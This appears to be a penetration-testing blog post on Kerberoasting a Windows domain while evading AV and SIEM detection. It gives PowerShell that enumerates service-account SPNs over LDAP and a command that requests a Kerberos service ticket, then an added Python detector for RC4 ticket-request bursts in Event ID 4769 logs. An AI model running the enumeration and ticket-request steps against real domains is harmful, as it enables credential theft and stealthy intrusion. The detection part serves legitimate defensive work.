Kerberoasting - In Windows without Detection

The usual Kerberoasting methods tend to get flagged at the point where you extract the ticket from the local machine cache after requesting it.
This is usually because that step involves mimikatz.
Although I love the functionality of mimikatz, every AV, SIEM and IDS/IPS is trying to block it as the tool becomes ever more popular.

The method below uses a different tool that *so far* (across 40 site pentests) hasn't triggered alerts.

Take the scenario of a Windows Server 2019 lab. Only one machine, the DC, is needed, since requesting tickets from other machines is irrelevant to Kerberoasting.

Firstly, let's run an LDAP query from memory, so as to stay stealthy and not touch disk, and return the list of SPNs registered on service accounts.
(Hit Enter twice and wait a short minute.)

#Build LDAP Filter to look for users with SPN values registered for current domain
$ldapFilter = "(&(objectclass=user)(objectcategory=user)(servicePrincipalName=*))"
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.PageSize = 1000
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"
#Execute Search
$results = $search.FindAll()
#Display SPN values from the returned objects
foreach ($result in $results)
{
    $userEntry = $result.GetDirectoryEntry()
    Write-Host "User Name = " $userEntry.name
    foreach ($SPN in $userEntry.servicePrincipalName)
    {
        Write-Host "SPN = " $SPN       
    }
    Write-Host ""    
}

We get the output as expected, as shown below.

Next we request a ticket for any SPN we found, like so:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"
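From the defender's side, the request above still lands in the DC's Security log as Event ID 4769 (a service ticket request), and Kerberoasting typically shows up there as one account requesting tickets for many distinct service accounts in a short burst, usually with RC4 encryption (type 0x17) because RC4 hashes are the fastest to crack. The following is an added example, not code from the original post, that runs that check over constructed 4769-style records; the field names, account names and timestamps are assumptions made up for illustration, only the PENTESTLAB.LOCAL realm comes from the post.

```python
# Added example (not from the original post): detect Kerberoasting-style bursts
# in Windows Security Event ID 4769 records. Events are constructed sample data.
from collections import defaultdict
from datetime import datetime

# (TimeCreated, TargetUserName, ServiceName, TicketEncryptionType, Status)
# Constructed sample, not real log data.
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:01", "jsmith@PENTESTLAB.LOCAL", "svc_sql", "0x17", "0x0"),
    ("2024-05-01T10:00:02", "jsmith@PENTESTLAB.LOCAL", "svc_http", "0x17", "0x0"),
    ("2024-05-01T10:00:02", "jsmith@PENTESTLAB.LOCAL", "svc_mssql2", "0x17", "0x0"),
    ("2024-05-01T10:00:03", "jsmith@PENTESTLAB.LOCAL", "svc_backup", "0x17", "0x0"),
    ("2024-05-01T10:00:05", "jsmith@PENTESTLAB.LOCAL", "WS01$", "0x17", "0x0"),
    ("2024-05-01T10:05:00", "amiller@PENTESTLAB.LOCAL", "svc_sql", "0x12", "0x0"),
    ("2024-05-01T09:00:00", "bjones@PENTESTLAB.LOCAL", "svc_sql", "0x17", "0x0"),
    ("2024-05-01T13:00:00", "bjones@PENTESTLAB.LOCAL", "svc_http", "0x17", "0x0"),
    ("2024-05-01T17:00:00", "bjones@PENTESTLAB.LOCAL", "svc_backup", "0x17", "0x0"),
]

# 0x17 = RC4-HMAC, 0x18 = RC4-HMAC-EXP: the ticket types Kerberoasters want.
WEAK_ETYPES = {"0x17", "0x18"}


def find_kerberoast_candidates(events, min_spns=3, window_seconds=300):
    """Return {account: sorted services} for accounts that obtained successful
    RC4 service tickets for >= min_spns distinct services within the window."""
    per_account = defaultdict(list)
    for when, account, service, etype, status in events:
        if status != "0x0" or etype.lower() not in WEAK_ETYPES:
            continue
        # Machine accounts (name ends in $) and the TGS itself are normal noise.
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        per_account[account].append((datetime.fromisoformat(when), service))
    hits = {}
    for account, reqs in per_account.items():
        reqs.sort()  # chronological, so each start index opens a window
        for i, (t0, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:]
                         if (t - t0).total_seconds() <= window_seconds}
            if len(in_window) >= min_spns:
                hits[account] = sorted(in_window)
                break
    return hits


if __name__ == "__main__":
    for account, services in find_kerberoast_candidates(SAMPLE_EVENTS).items():
        print(f"{account}: {len(services)} RC4 service tickets -> {services}")
```

In this sample only jsmith trips the default 5-minute window; bjones' three RC4 requests are spread over eight hours and only show up if the window is widened, which is the trade-off to tune against your own baseline of legitimate service-ticket traffic.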
